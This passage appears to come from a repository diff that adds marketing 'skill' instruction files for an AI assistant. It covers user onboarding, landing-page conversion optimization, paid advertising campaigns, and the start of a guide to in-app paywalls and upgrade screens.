### Find Your Aha Moment
The action that correlates most strongly with retention:
- What do retained users do that churned users don't?
- What's the earliest indicator of future engagement?
- What action demonstrates they "got it"?
**Examples by product type:**
- Project management: Create first project + add team member
- Analytics: Install tracking + see first report
- Design tool: Create first design + export/share
- Collaboration: Invite first teammate
- Marketplace: Complete first transaction
### Activation Metrics
- % of signups who reach activation
- Time to activation
- Steps to activation
- Activation by cohort/source
---
## Onboarding Flow Design
### Immediate Post-Signup (First 30 Seconds)
**Options:**
1. **Product-first**: Drop directly into product
- Best for: Simple products, B2C, mobile apps
- Risk: Blank slate overwhelm
2. **Guided setup**: Short wizard to configure
- Best for: Products needing personalization
- Risk: Adds friction before value
3. **Value-first**: Show outcome immediately
- Best for: Products with demo data or samples
- Risk: May not feel "real"
**Whatever you choose:**
- Clear single next action
- No dead ends
- Progress indication if multi-step
### Onboarding Checklist Pattern
**When to use:**
- Multiple setup steps required
- Product has several features to discover
- Self-serve B2B products
**Best practices:**
- 3-7 items (not overwhelming)
- Order by value (most impactful first)
- Start with quick wins
- Progress bar/completion %
- Celebration on completion
- Dismiss option (don't trap users)
**Checklist item structure:**
- Clear action verb
- Benefit hint
- Estimated time
- Quick-start capability
Example:
```
☐ Connect your first data source (2 min)
Get real-time insights from your existing tools
[Connect Now]
```
### Empty States
Empty states are onboarding opportunities, not dead ends.
**Good empty state:**
- Explains what this area is for
- Shows what it looks like with data
- Clear primary action to add first item
- Optional: Pre-populate with example data
**Structure:**
1. Illustration or preview
2. Brief explanation of value
3. Primary CTA to add first item
4. Optional: Secondary action (import, template)
### Tooltips and Guided Tours
**When to use:**
- Complex UI that benefits from orientation
- Features that aren't self-evident
- Power features users might miss
**When to avoid:**
- Simple, intuitive interfaces
- Mobile apps (limited screen space)
- When they interrupt important flows
**Best practices:**
- Max 3-5 steps per tour
- Point to actual UI elements
- Dismissable at any time
- Don't repeat for returning users
- Consider user-initiated tours
### Progress Indicators
**Types:**
- Checklist (discrete tasks)
- Progress bar (% complete)
- Level/stage indicator
- Profile completeness
**Best practices:**
- Show early progress (start at 20%, not 0%)
- Quick early wins (first items easy to complete)
- Clear benefit of completing
- Don't block features behind completion
---
## Multi-Channel Onboarding
### Email + In-App Coordination
**Trigger-based emails:**
- Welcome email (immediate)
- Incomplete onboarding (24h, 72h)
- Activation achieved (celebration + next step)
- Feature discovery (days 3, 7, 14)
- Stalled user re-engagement
**Email should:**
- Reinforce in-app actions
- Not duplicate in-app messaging
- Drive back to product with specific CTA
- Be personalized based on actions taken
### Push Notifications (Mobile)
- Permission timing is critical (not immediately)
- Clear value proposition for enabling
- Reserve for genuine value moments
- Re-engagement for stalled users
---
## Engagement Loops
### Building Habits
- What regular action should users take?
- What trigger can prompt return?
- What reward reinforces the behavior?
**Loop structure:**
Trigger → Action → Variable Reward → Investment
**Examples:**
- Trigger: Email digest of activity
- Action: Log in to respond
- Reward: Social engagement, progress, achievement
- Investment: Add more data, connections, content
### Milestone Celebrations
- Acknowledge meaningful achievements
- Show progress relative to journey
- Suggest next milestone
- Shareable moments (social proof generation)
---
## Handling Stalled Users
### Detection
- Define "stalled" criteria (X days inactive, incomplete setup)
- Monitor at cohort level
- Track recovery rate
### Re-engagement Tactics
1. **Email sequence for incomplete onboarding**
- Reminder of value proposition
- Address common blockers
- Offer help/demo/call
- Deadline/urgency if appropriate
2. **In-app recovery**
- Welcome back message
- Pick up where they left off
- Simplified path to activation
3. **Human touch**
- For high-value accounts: personal outreach
- Offer live walkthrough
- Ask what's blocking them
---
## Measurement
### Key Metrics
- **Activation rate**: % reaching activation event
- **Time to activation**: How long to first value
- **Onboarding completion**: % completing setup
- **Day 1/7/30 retention**: Return rate by timeframe
- **Feature adoption**: Which features get used
### Funnel Analysis
Track drop-off at each step:
```
Signup → Step 1 → Step 2 → Activation → Retention
100% 80% 60% 40% 25%
```
Identify biggest drops and focus there.
---
## Output Format
### Onboarding Audit
For each issue:
- **Finding**: What's happening
- **Impact**: Why it matters
- **Recommendation**: Specific fix
- **Priority**: High/Medium/Low
### Onboarding Flow Design
- **Activation goal**: What they should achieve
- **Step-by-step flow**: Each screen/state
- **Checklist items**: If applicable
- **Empty states**: Copy and CTA
- **Email sequence**: Triggers and content
- **Metrics plan**: What to measure
### Copy Deliverables
- Welcome screen copy
- Checklist items with microcopy
- Empty state copy
- Tooltip content
- Email sequence copy
- Milestone celebration copy
---
## Common Patterns by Product Type
### B2B SaaS Tool
1. Short setup wizard (use case selection)
2. First value-generating action
3. Team invitation prompt
4. Checklist for deeper setup
### Marketplace/Platform
1. Complete profile
2. First search/browse
3. First transaction
4. Repeat engagement loop
### Mobile App
1. Permission requests (strategic timing)
2. Quick win in first session
3. Push notification setup
4. Habit loop establishment
### Content/Social Platform
1. Follow/customize feed
2. First content consumption
3. First content creation
4. Social connection/engagement
---
## Experiment Ideas
### Flow Simplification Experiments
**Reduce Friction**
- Add or remove email verification during onboarding
- Test empty states vs. pre-populated dummy data
- Provide pre-filled templates to accelerate setup
- Add OAuth options for faster account linking
- Reduce number of required onboarding steps
**Step Sequencing**
- Test different ordering of onboarding steps
- Lead with highest-value features first
- Move friction-heavy steps later in flow
- Test required vs. optional step balance
**Progress & Motivation**
- Add progress bars or completion percentages
- Test onboarding checklists (3-5 items vs. 5-7 items)
- Gamify milestones with badges or rewards
- Show "X% complete" messaging
---
### Guided Experience Experiments
**Product Tours**
- Add interactive product tours (Navattic, Storylane)
- Test tooltip-based guidance vs. modal walkthroughs
- Video tutorials for complex workflows
- Self-paced vs. guided tour options
**CTA Optimization**
- Test CTA text variations during onboarding
- Test CTA placement within onboarding screens
- Add in-app tooltips for advanced features
- Sticky CTAs that persist during onboarding
---
### Personalization Experiments
**User Segmentation**
- Segment users by role to show relevant features
- Segment by goal to customize onboarding path
- Create role-specific dashboards
- Ask use-case question to personalize flow
**Dynamic Content**
- Personalized welcome messages
- Industry-specific examples and templates
- Dynamic feature recommendations based on answers
---
### Quick Wins & Engagement Experiments
**Time-to-Value**
- Highlight quick wins early ("Complete your first X")
- Show success messages after key actions
- Display progress celebrations at milestones
- Suggest next steps after each completion
**Support & Help**
- Offer free onboarding calls for complex products
- Add contextual help throughout onboarding
- Test chat support availability during onboarding
- Proactive outreach for stuck users
---
### Email & Multi-Channel Experiments
**Onboarding Emails**
- Personalized welcome email from founder
- Behavior-based emails (triggered by actions/inactions)
- Test email timing and frequency
- Include quick tips and video content
**Feedback Loops**
- Add NPS survey during onboarding
- Ask "What's blocking you?" for incomplete users
- Follow-up based on NPS score
---
## Questions to Ask
If you need more context:
1. What action most correlates with retention?
2. What happens immediately after signup?
3. Where do users currently drop off?
4. What's your activation rate target?
5. Do you have cohort analysis on successful vs. churned users?
---
## Related Skills
- **signup-flow-cro**: For optimizing the signup before onboarding
- **email-sequence**: For onboarding email series
- **paywall-upgrade-cro**: For converting to paid during/after onboarding
- **ab-test-setup**: For testing onboarding changes

334
skills/page-cro/SKILL.md Normal file
View File

@@ -0,0 +1,334 @@
---
name: page-cro
description: When the user wants to optimize, improve, or increase conversions on any marketing page — including homepage, landing pages, pricing pages, feature pages, or blog posts. Also use when the user says "CRO," "conversion rate optimization," "this page isn't converting," "improve conversions," or "why isn't this page working." For signup/registration flows, see signup-flow-cro. For post-signup activation, see onboarding-cro. For forms outside of signup, see form-cro. For popups/modals, see popup-cro.
---
# Page Conversion Rate Optimization (CRO)
You are a conversion rate optimization expert. Your goal is to analyze marketing pages and provide actionable recommendations to improve conversion rates.
## Initial Assessment
Before providing recommendations, identify:
1. **Page Type**: What kind of page is this?
- Homepage
- Landing page (paid traffic, specific campaign)
- Pricing page
- Feature/product page
- Blog post with CTA
- About page
- Other
2. **Primary Conversion Goal**: What's the one thing this page should get visitors to do?
- Sign up / Start trial
- Request demo
- Purchase
- Subscribe to newsletter
- Download resource
- Contact sales
- Other
3. **Traffic Context**: If known, where are visitors coming from?
- Organic search (what intent?)
- Paid ads (what messaging?)
- Social media
- Email
- Referral
- Direct
## CRO Analysis Framework
Analyze the page across these dimensions, in order of impact:
### 1. Value Proposition Clarity (Highest Impact)
**Check for:**
- Can a visitor understand what this is and why they should care within 5 seconds?
- Is the primary benefit clear, specific, and differentiated?
- Does it address a real pain point or desire?
- Is it written in the customer's language (not company jargon)?
**Common issues:**
- Feature-focused instead of benefit-focused
- Too vague ("The best solution for your needs")
- Too clever (sacrificing clarity for creativity)
- Trying to say everything instead of the one most important thing
### 2. Headline Effectiveness
**Evaluate:**
- Does it communicate the core value proposition?
- Is it specific enough to be meaningful?
- Does it create curiosity or urgency without being clickbait?
- Does it match the traffic source's messaging (ad → landing page consistency)?
**Strong headline patterns:**
- Outcome-focused: "Get [desired outcome] without [pain point]"
- Specificity: Include numbers, timeframes, or concrete details
- Social proof baked in: "Join 10,000+ teams who..."
- Direct address of pain: "Tired of [specific problem]?"
### 3. CTA Placement, Copy, and Hierarchy
**Primary CTA assessment:**
- Is there one clear primary action?
- Is it visible without scrolling (above the fold)?
- Does the button copy communicate value, not just action?
- Weak: "Submit," "Sign Up," "Learn More"
- Strong: "Start Free Trial," "Get My Report," "See Pricing"
- Is there sufficient contrast and visual weight?
**CTA hierarchy:**
- Is there a logical primary vs. secondary CTA structure?
- Are CTAs repeated at key decision points (after benefits, after social proof, etc.)?
- Is the commitment level appropriate for the page stage?
### 4. Visual Hierarchy and Scannability
**Check:**
- Can someone scanning get the main message?
- Are the most important elements visually prominent?
- Is there clear information hierarchy (H1 → H2 → body)?
- Is there enough white space to let elements breathe?
- Do images support or distract from the message?
**Common issues:**
- Wall of text with no visual breaks
- Competing elements fighting for attention
- Important information buried below the fold
- Stock photos that add nothing
### 5. Trust Signals and Social Proof
**Types to look for:**
- Customer logos (especially recognizable ones)
- Testimonials (specific, attributed, with photos)
- Case study snippets with real numbers
- Review scores and counts
- Security badges (where relevant)
- "As seen in" media mentions
- Team/founder credibility
**Placement:**
- Near CTAs (to reduce friction at decision point)
- After benefit claims (to validate them)
- Throughout the page at natural break points
### 6. Objection Handling
**Identify likely objections for this page type:**
- Price/value concerns
- "Will this work for my situation?"
- Implementation difficulty
- Time to value
- Switching costs
- Trust/legitimacy concerns
- "What if it doesn't work?"
**Check if the page addresses these through:**
- FAQ sections
- Guarantee/refund policies
- Comparison content
- Feature explanations
- Process transparency
### 7. Friction Points
**Look for unnecessary friction:**
- Too many form fields
- Unclear next steps
- Confusing navigation
- Required information that shouldn't be required
- Broken or slow elements
- Mobile experience issues
- Long load times
## Output Format
Structure your recommendations as:
### Quick Wins (Implement Now)
Changes that are easy to make and likely to have immediate impact.
### High-Impact Changes (Prioritize)
Bigger changes that require more effort but will significantly improve conversions.
### Test Ideas
Hypotheses worth A/B testing rather than assuming.
### Copy Alternatives
For key elements (headlines, CTAs, value props), provide 2-3 alternative versions with rationale.
---
## Page-Specific Frameworks
### Homepage CRO
Homepages serve multiple audiences. Focus on:
- Clear positioning statement that works for cold visitors
- Quick path to most common conversion action
- Navigation that helps visitors self-select
- Handling both "ready to buy" and "still researching" visitors
### Landing Page CRO
Single-purpose pages. Focus on:
- Message match with traffic source
- Single CTA (remove navigation if possible)
- Complete argument on one page (minimize clicks to convert)
- Urgency/scarcity if genuine
### Pricing Page CRO
High-intent visitors. Focus on:
- Clear plan comparison
- Recommended plan indication
- Feature clarity (what's included/excluded)
- Addressing "which plan is right for me?" anxiety
- Easy path from pricing to checkout
### Feature Page CRO
Visitors researching specifics. Focus on:
- Connecting feature to benefit
- Use cases and examples
- Comparison to alternatives
- Clear CTA to try/buy
### Blog Post CRO
Content-to-conversion. Focus on:
- Contextual CTAs that match content topic
- Lead magnets related to article subject
- Inline CTAs at natural stopping points
- Exit-intent as backup
---
## Experiment Ideas by Page Type
### Homepage Experiments
**Hero Section**
- Test headline variations (specific vs. abstract, benefit vs. feature)
- Add or refine subheadline for clarity
- Include or exclude prominent CTA above the fold
- Test hero visual: screenshot vs. GIF vs. illustration vs. video
- A/B test CTA button colors for contrast
- Test different CTA button text ("Start Free Trial" vs. "Get Started" vs. "See Demo")
- Add interactive demo to engage visitors immediately
**Trust & Social Proof**
- Test placement of customer logos (hero vs. below fold)
- Showcase case studies or testimonials in hero section
- Add trust badges (security, compliance, awards)
- Test customer count or social proof in headline
**Features & Content**
- Highlight key features with icons and brief descriptions
- Test feature section order and prominence
- Add or remove secondary CTAs throughout page
**Navigation & UX**
- Add sticky navigation bar with persistent CTA
- Test navigation menu order (high-priority items at edges)
- Add prominent CTA button in nav bar
- Live chat widget vs. AI chatbot for instant support
- Optimize footer for clarity and secondary conversions
---
### Pricing Page Experiments
**Price Presentation**
- Highlight annual billing discounts vs. show monthly only vs. show both
- Test different pricing points ($99 vs. $100 vs. $97)
- Add "Most Popular" or "Recommended" badge to target plan
- Experiment with number of visible tiers (3 vs. 4 vs. 2)
- Use price anchoring strategically
**Pricing UX**
- Add pricing calculator for complex/usage-based pricing
- Turn complex pricing table into guided multistep form
- Test feature comparison table formats
- Add toggle for monthly/annual with savings highlighted
- Test "Contact Sales" vs. showing enterprise pricing
**Objection Handling**
- Add FAQ section addressing common pricing objections
- Include ROI calculator or value demonstration
- Add money-back guarantee prominently
- Show price-per-user breakdowns for team plans
- Include "What's included" clarity for each tier
**Trust Signals**
- Add testimonials specific to pricing/value
- Show customer logos near pricing
- Display review scores from G2/Capterra
---
### Demo Request Page Experiments
**Form Optimization**
- Simplify demo request form (fewer fields)
- Test multi-step form with progress bar vs. single-step
- Test form placement: above fold vs. after content
- Add or remove phone number field
- Use field enrichment to hide known fields
**Page Content**
- Optimize demo page content with benefits above form
- Add product video or GIF showing demo experience
- Include "What You'll Learn" section
- Add customer testimonials near form
- Address common objections in FAQ
**CTA & Routing**
- Test demo button CTAs ("Book Your Demo" vs. "Schedule 15-Min Call")
- Offer on-demand demo alongside live option
- Personalize demo page messaging based on visitor data
- Remove navigation to reduce distractions
- Optimize routing: calendar link for qualified, self-serve for others
---
### Resource/Blog Page Experiments
**Content CTAs**
- Add floating or sticky CTAs on blog posts
- Test inline CTAs within content vs. end-of-post only
- Show estimated reading time
- Add related resources at end of article
- Test gated vs. free content strategies
**Resource Section**
- Optimize resource section navigation and filtering
- Add search functionality
- Highlight featured or popular resources
- Test grid vs. list view layouts
- Create resource bundles by topic
---
## Questions to Ask the User
If you need more context, ask:
1. What's your current conversion rate and goal?
2. Where is traffic coming from?
3. What does your signup/purchase flow look like after this page?
4. Do you have any user research, heatmaps, or session recordings?
5. What have you already tried?
---
## Related Skills
- **signup-flow-cro**: If the issue is in the signup process itself, not the page leading to it
- **form-cro**: If forms on the page need optimization
- **popup-cro**: If considering popups as part of the conversion strategy
- **copywriting**: If the page needs a complete copy rewrite rather than CRO tweaks
- **ab-test-setup**: To properly test recommended changes

551
skills/paid-ads/SKILL.md Normal file
View File

@@ -0,0 +1,551 @@
---
name: paid-ads
description: "When the user wants help with paid advertising campaigns on Google Ads, Meta (Facebook/Instagram), LinkedIn, Twitter/X, or other ad platforms. Also use when the user mentions 'PPC,' 'paid media,' 'ad copy,' 'ad creative,' 'ROAS,' 'CPA,' 'ad campaign,' 'retargeting,' or 'audience targeting.' This skill covers campaign strategy, ad creation, audience targeting, and optimization."
---
# Paid Ads
You are an expert performance marketer with direct access to ad platform accounts. Your goal is to help create, optimize, and scale paid advertising campaigns that drive efficient customer acquisition.
## Before Starting
Gather this context (ask if not provided):
### 1. Campaign Goals
- What's the primary objective? (Awareness, traffic, leads, sales, app installs)
- What's the target CPA or ROAS?
- What's the monthly/weekly budget?
- Any constraints? (Brand guidelines, compliance, geographic)
### 2. Product & Offer
- What are you promoting? (Product, free trial, lead magnet, demo)
- What's the landing page URL?
- What makes this offer compelling?
- Any promotions or urgency elements?
### 3. Audience
- Who is the ideal customer?
- What problem does your product solve for them?
- What are they searching for or interested in?
- Do you have existing customer data for lookalikes?
### 4. Current State
- Have you run ads before? What worked/didn't?
- Do you have existing pixel/conversion data?
- What's your current funnel conversion rate?
- Any existing creative assets?
---
## Platform Selection Guide
### Google Ads
**Best for:** High-intent search traffic, capturing existing demand
**Use when:**
- People actively search for your solution
- You have clear keywords with commercial intent
- You want bottom-of-funnel conversions
**Campaign types:**
- Search: Keyword-targeted text ads
- Performance Max: AI-driven cross-channel
- Display: Banner ads across Google network
- YouTube: Video ads
- Demand Gen: Discovery and Gmail placements
### Meta (Facebook/Instagram)
**Best for:** Demand generation, visual products, broad targeting
**Use when:**
- Your product has visual appeal
- You're creating demand (not just capturing it)
- You have strong creative assets
- You want to build audiences for retargeting
**Campaign types:**
- Advantage+ Shopping: E-commerce automation
- Lead Gen: In-platform lead forms
- Conversions: Website conversion optimization
- Traffic: Link clicks to site
- Engagement: Social proof building
### LinkedIn Ads
**Best for:** B2B targeting, reaching decision-makers
**Use when:**
- You're selling to businesses
- Job title/company targeting matters
- Higher price points justify higher CPCs
- You need to reach specific industries
**Campaign types:**
- Sponsored Content: Feed posts
- Message Ads: Direct InMail
- Lead Gen Forms: In-platform capture
- Document Ads: Gated content
- Conversation Ads: Interactive messaging
### Twitter/X Ads
**Best for:** Tech audiences, real-time relevance, thought leadership
**Use when:**
- Your audience is active on X
- You have timely/trending content
- You want to amplify organic content
- Lower CPMs matter more than precision targeting
### TikTok Ads
**Best for:** Younger demographics, viral creative, brand awareness
**Use when:**
- Your audience skews younger (18-34)
- You can create native-feeling video content
- Brand awareness is a goal
- You have creative capacity for video
---
## Campaign Structure Best Practices
### Account Organization
```
Account
├── Campaign 1: [Objective] - [Audience/Product]
│ ├── Ad Set 1: [Targeting variation]
│ │ ├── Ad 1: [Creative variation A]
│ │ ├── Ad 2: [Creative variation B]
│ │ └── Ad 3: [Creative variation C]
│ └── Ad Set 2: [Targeting variation]
│ └── Ads...
└── Campaign 2...
```
### Naming Conventions
Use consistent naming for easy analysis:
```
[Platform]_[Objective]_[Audience]_[Offer]_[Date]
Examples:
META_Conv_Lookalike-Customers_FreeTrial_2024Q1
GOOG_Search_Brand_Demo_Ongoing
LI_LeadGen_CMOs-SaaS_Whitepaper_Mar24
```
### Budget Allocation Framework
**Testing phase (first 2-4 weeks):**
- 70% to proven/safe campaigns
- 30% to testing new audiences/creative
**Scaling phase:**
- Consolidate budget into winning combinations
- Increase budgets 20-30% at a time
- Wait 3-5 days between increases for algorithm learning
---
## Ad Copy Frameworks
### Primary Text Formulas
**Problem-Agitate-Solve (PAS):**
```
[Problem statement]
[Agitate the pain]
[Introduce solution]
[CTA]
```
Example:
> Spending hours on manual reporting every week?
> While you're buried in spreadsheets, your competitors are making decisions.
> [Product] automates your reports in minutes.
> Start your free trial →
**Before-After-Bridge (BAB):**
```
[Current painful state]
[Desired future state]
[Your product as the bridge]
```
Example:
> Before: Chasing down approvals across email, Slack, and spreadsheets.
> After: Every approval tracked, automated, and on time.
> [Product] connects your tools and keeps projects moving.
**Social Proof Lead:**
```
[Impressive stat or testimonial]
[What you do]
[CTA]
```
Example:
> "We cut our reporting time by 75%." — Sarah K., Marketing Director
> [Product] automates the reports you hate building.
> See how it works →
### Headline Formulas
**For Search Ads:**
- [Keyword] + [Benefit]: "Project Management That Teams Actually Use"
- [Action] + [Outcome]: "Automate Reports | Save 10 Hours Weekly"
- [Question]: "Tired of Manual Data Entry?"
- [Number] + [Benefit]: "500+ Teams Trust [Product] for [Outcome]"
**For Social Ads:**
- Hook with outcome: "How we 3x'd our conversion rate"
- Hook with curiosity: "The reporting hack no one talks about"
- Hook with contrarian: "Why we stopped using [common tool]"
- Hook with specificity: "The exact template we use for..."
### CTA Variations
**Soft CTAs (awareness/consideration):**
- Learn More
- See How It Works
- Watch Demo
- Get the Guide
**Hard CTAs (conversion):**
- Start Free Trial
- Get Started Free
- Book a Demo
- Claim Your Discount
- Buy Now
**Urgency CTAs (when genuine):**
- Limited Time: 30% Off
- Offer Ends [Date]
- Only X Spots Left
---
## Audience Targeting Strategies
### Google Ads Audiences
**Search campaigns:**
- Keywords (exact, phrase, broad match)
- Audience layering (observation mode first)
- Remarketing lists for search ads (RLSA)
**Display/YouTube:**
- Custom intent (based on search behavior)
- In-market audiences
- Affinity audiences
- Customer match (upload email lists)
- Similar/lookalike audiences
### Meta Audiences
**Core audiences (interest/demographic):**
- Layer interests with AND logic for precision
- Exclude existing customers
- Start broad, let algorithm optimize
**Custom audiences:**
- Website visitors (by page, time on site, frequency)
- Customer list uploads
- Engagement (video viewers, page engagers)
- App activity
**Lookalike audiences:**
- Source: Best customers (by LTV, not just all customers)
- Size: Start 1%, expand to 1-3% as you scale
- Layer: Lookalike + interest for early testing
### LinkedIn Audiences
**Job-based targeting:**
- Job titles (be specific, avoid broad)
- Job functions + seniority
- Skills (self-reported)
**Company-based targeting:**
- Company size
- Industry
- Company names (ABM)
- Company growth rate
**Combinations that work:**
- Job function + seniority + company size
- Industry + job title
- Company list + decision-maker titles
---
## Creative Best Practices
### Image Ads
**What works:**
- Clear product screenshots showing UI
- Before/after comparisons
- Stats and numbers as focal point
- Human faces (real, not stock)
- Bold, readable text overlay (keep under 20%)
**What doesn't:**
- Generic stock photos
- Too much text
- Cluttered visuals
- Low contrast/hard to read
### Video Ads
**Structure for short-form (15-30 sec):**
1. Hook (0-3 sec): Pattern interrupt, question, or bold statement
2. Problem (3-8 sec): Relatable pain point
3. Solution (8-20 sec): Show product/benefit
4. CTA (20-30 sec): Clear next step
**Structure for longer-form (60+ sec):**
1. Hook (0-5 sec)
2. Problem deep-dive (5-20 sec)
3. Solution introduction (20-35 sec)
4. Social proof (35-45 sec)
5. How it works (45-55 sec)
6. CTA with offer (55-60 sec)
**Production tips:**
- Captions always (85% watch without sound)
- Vertical for Stories/Reels, square for feed
- Native feel outperforms polished
- First 3 seconds determine if they watch
### Ad Creative Testing
**Testing hierarchy:**
1. Concept/angle (biggest impact)
2. Hook/headline
3. Visual style
4. Body copy
5. CTA
**Testing approach:**
- Test one variable at a time for clean data
- Need 100+ conversions per variant for significance
- Kill losers fast (3-5 days with sufficient spend)
- Iterate on winners
---
## Campaign Optimization
### Key Metrics by Objective
**Awareness:**
- CPM (cost per 1,000 impressions)
- Reach and frequency
- Video view rate / watch time
- Brand lift (if available)
**Consideration:**
- CTR (click-through rate)
- CPC (cost per click)
- Landing page views
- Time on site from ads
**Conversion:**
- CPA (cost per acquisition)
- ROAS (return on ad spend)
- Conversion rate
- Cost per lead / cost per sale
### Optimization Levers
**If CPA is too high:**
1. Check landing page (is the problem post-click?)
2. Tighten audience targeting
3. Test new creative angles
4. Improve ad relevance/quality score
5. Adjust bid strategy
**If CTR is low:**
- Creative isn't resonating → test new hooks/angles
- Audience mismatch → refine targeting
- Ad fatigue → refresh creative
- Weak offer → improve value proposition
**If CPM is high:**
- Audience too narrow → expand targeting
- High competition → try different placements
- Low relevance score → improve creative fit
- Bidding too aggressively → adjust bid caps
### Bid Strategies
**Manual/controlled:**
- Use when: Learning phase, small budgets, need control
- Manual CPC, bid caps, cost caps
**Automated/smart:**
- Use when: Sufficient conversion data (50+ per month), scaling
- Target CPA, target ROAS, maximize conversions
**Progression:**
1. Start with manual or cost caps
2. Gather conversion data (50+ conversions)
3. Switch to automated with targets based on historical data
4. Monitor and adjust targets based on results
---
## Retargeting Strategies
### Funnel-Based Retargeting
**Top of funnel (awareness):**
- Audience: Blog readers, video viewers, social engagers
- Message: Educational content, social proof
- Goal: Move to consideration
**Middle of funnel (consideration):**
- Audience: Pricing page visitors, feature page visitors
- Message: Case studies, demos, comparisons
- Goal: Move to decision
**Bottom of funnel (decision):**
- Audience: Cart abandoners, trial users, demo no-shows
- Message: Urgency, objection handling, offers
- Goal: Convert
### Retargeting Windows
| Stage | Window | Frequency Cap |
|-------|--------|---------------|
| Hot (cart/trial) | 1-7 days | Higher OK |
| Warm (key pages) | 7-30 days | 3-5x/week |
| Cold (any visit) | 30-90 days | 1-2x/week |
### Exclusions to Set Up
Always exclude:
- Existing customers (unless upsell campaign)
- Recent converters (7-14 day window)
- Bounced visitors (<10 sec on site)
- Irrelevant pages (careers, support)
---
## Reporting & Analysis
### Weekly Review Checklist
- [ ] Spend vs. budget pacing
- [ ] CPA/ROAS vs. targets
- [ ] Top and bottom performing ads
- [ ] Audience performance breakdown
- [ ] Frequency check (fatigue risk)
- [ ] Landing page conversion rate
- [ ] Any disapproved ads or policy issues
### Monthly Analysis
- [ ] Overall channel performance vs. goals
- [ ] Creative performance trends
- [ ] Audience insights and learnings
- [ ] Budget reallocation recommendations
- [ ] Test results and next tests
- [ ] Competitive landscape changes
### Attribution Considerations
- Platform attribution is inflated (they want credit)
- Use UTM parameters consistently
- Compare platform data to GA4/analytics
- Consider incrementality testing for mature accounts
- Look at blended CAC, not just platform CPA
---
## Platform-Specific Setup Guides
### Google Ads Setup Checklist
- [ ] Conversion tracking installed and tested
- [ ] Google Analytics 4 linked
- [ ] Audience lists created (remarketing, customer match)
- [ ] Negative keyword lists built
- [ ] Ad extensions set up (sitelinks, callouts, structured snippets)
- [ ] Brand campaign running (protect branded terms)
- [ ] Competitor campaign considered
- [ ] Location and language targeting set
- [ ] Ad schedule aligned with business hours (if B2B)
### Meta Ads Setup Checklist
- [ ] Pixel installed and events firing
- [ ] Conversions API set up (server-side tracking)
- [ ] Custom audiences created
- [ ] Product catalog connected (if e-commerce)
- [ ] Domain verified
- [ ] Business Manager properly configured
- [ ] Aggregated event measurement prioritized
- [ ] Creative assets in correct sizes
- [ ] UTM parameters in all URLs
### LinkedIn Ads Setup Checklist
- [ ] Insight Tag installed
- [ ] Conversion tracking configured
- [ ] Matched audiences created
- [ ] Company page connected
- [ ] Lead gen form templates created
- [ ] Document assets uploaded (for Document Ads)
- [ ] Audience size validated (not too narrow)
- [ ] Budget realistic for LinkedIn CPCs ($8-15+)
---
## Common Mistakes to Avoid
### Strategy Mistakes
- Launching without conversion tracking
- Too many campaigns/ad sets (fragmenting budget)
- Not giving algorithms enough learning time
- Optimizing for wrong metric (clicks vs. conversions)
- Ignoring landing page experience
### Targeting Mistakes
- Audiences too narrow (can't exit learning phase)
- Audiences too broad (wasting spend)
- Not excluding existing customers
- Overlapping audiences competing with each other
- Ignoring negative keywords (Search)
### Creative Mistakes
- Only running one ad per ad set
- Not refreshing creative (ad fatigue)
- Mismatch between ad and landing page
- Ignoring mobile experience
- Too much text in images (Meta)
### Budget Mistakes
- Spreading budget too thin across campaigns
- Making big budget changes (disrupts learning)
- Not accounting for platform minimums
- Stopping campaigns during learning phase
- Weekend/off-hours spend without adjustment
---
## Questions to Ask
If you need more context:
1. What platform(s) are you currently running or want to start with?
2. What's your monthly ad budget?
3. What does a successful conversion look like (and what's it worth)?
4. Do you have existing creative assets or need to create them?
5. What landing page will ads point to?
6. Do you have pixel/conversion tracking set up?
---
## Related Skills
- **copywriting**: For landing page copy that converts ad traffic
- **analytics-tracking**: For proper conversion tracking setup
- **ab-test-setup**: For landing page testing to improve ROAS
- **page-cro**: For optimizing post-click conversion rates

570
skills/paywall-upgrade-cro/SKILL.md Normal file
View File

@@ -0,0 +1,570 @@
---
name: paywall-upgrade-cro
description: When the user wants to create or optimize in-app paywalls, upgrade screens, upsell modals, or feature gates. Also use when the user mentions "paywall," "upgrade screen," "upgrade modal," "upsell," "feature gate," "convert free to paid," "freemium conversion," "trial expiration screen," "limit reached screen," "plan upgrade prompt," or "in-app pricing." Distinct from public pricing pages (see page-cro) — this skill focuses on in-product upgrade moments where the user has already experienced value.
---
# Paywall and Upgrade Screen CRO
You are an expert in in-app paywalls and upgrade flows. Your goal is to convert free users to paid, or upgrade users to higher tiers, at moments when they've experienced enough value to justify the commitment.
## Initial Assessment
Before providing recommendations, understand:
1. **Upgrade Context**
- Freemium → Paid conversion
- Trial → Paid conversion
- Tier upgrade (Basic → Pro)
- Feature-specific upsell
- Usage limit upsell
2. **Product Model**
- What's free forever?
- What's behind the paywall?
- What triggers upgrade prompts?
- What's the current conversion rate?
3. **User Journey**
- At what point does this appear?
- What have they experienced already?
- What are they trying to do when blocked?
---
## Core Principles
### 1. Value Before Ask
- User should have experienced real value first
- The upgrade should feel like a natural next step
- Timing: After "aha moment," not before
### 2. Show, Don't Just Tell
- Demonstrate the value of paid features
- Preview what they're missing
- Make the upgrade feel tangible
### 3. Friction-Free Path
- Easy to upgrade when ready
- Don't make them hunt for pricing
- Remove barriers to conversion
### 4. Respect the No
- Don't trap or pressure
- Make it easy to continue free
- Maintain trust for future conversion
---
## Paywall Trigger Points
### Feature Gates
When user clicks a paid-only feature:
- Clear explanation of why it's paid
- Show what the feature does
- Quick path to unlock
- Option to continue without
### Usage Limits
When user hits a limit:
- Clear indication of what limit was reached
- Show what upgrading provides
- Option to buy more without full upgrade
- Don't block abruptly
### Trial Expiration
When trial is ending:
- Early warnings (7 days, 3 days, 1 day)
- Clear "what happens" on expiration
- Easy re-activation if expired
- Summarize value received
### Time-Based Prompts
After X days/sessions of free use:
- Gentle upgrade reminder
- Highlight unused paid features
- Not intrusive—banner or subtle modal
- Easy to dismiss
### Context-Triggered
When behavior indicates upgrade fit:
- Power users who'd benefit
- Teams using solo features
- Heavy usage approaching limits
- Inviting teammates
---
## Paywall Screen Components
### 1. Headline
Focus on what they get, not what they pay:
- "Unlock [Feature] to [Benefit]"
- "Get more [value] with [Plan]"
- Not: "Upgrade to Pro for $X/month"
### 2. Value Demonstration
Show what they're missing:
- Preview of the feature in action
- Before/after comparison
- "With Pro, you could..." examples
- Specific to their use case if possible
### 3. Feature Comparison
If showing tiers:
- Highlight key differences
- Current plan clearly marked
- Recommended plan emphasized
- Focus on outcomes, not feature lists
### 4. Pricing
- Clear, simple pricing
- Annual vs. monthly options
- Per-seat clarity if applicable
- Any trials or guarantees
### 5. Social Proof (Optional)
- Customer quotes about the upgrade
- "X teams use this feature"
